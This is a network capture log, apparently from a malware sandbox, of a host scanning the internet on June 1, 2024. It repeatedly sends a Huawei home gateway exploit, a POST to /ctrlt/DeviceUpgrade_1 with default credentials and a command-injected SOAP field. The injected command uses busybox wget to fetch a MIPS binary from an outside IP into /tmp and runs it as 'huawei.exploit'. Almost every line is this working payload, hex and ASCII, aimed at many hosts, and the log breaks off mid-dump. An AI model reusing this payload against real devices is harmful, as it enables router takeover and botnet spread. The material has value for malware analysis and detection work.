                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    187192.168.2.233861241.193.154.17537215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.251240015 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    188192.168.2.2345328156.193.10.4537215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.251351118 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    189192.168.2.233638641.249.106.1137215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.251379013 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    190192.168.2.2340714197.215.123.20337215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.251426935 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    191192.168.2.2356050156.198.133.17937215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.251475096 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    192192.168.2.2352998156.85.186.8937215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.251517057 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    193192.168.2.234558641.144.64.24537215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.251571894 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    194192.168.2.2338836156.141.233.12437215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.251611948 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    195192.168.2.234319641.64.231.15437215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.251665115 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    196192.168.2.235545241.61.54.9337215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.251713991 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 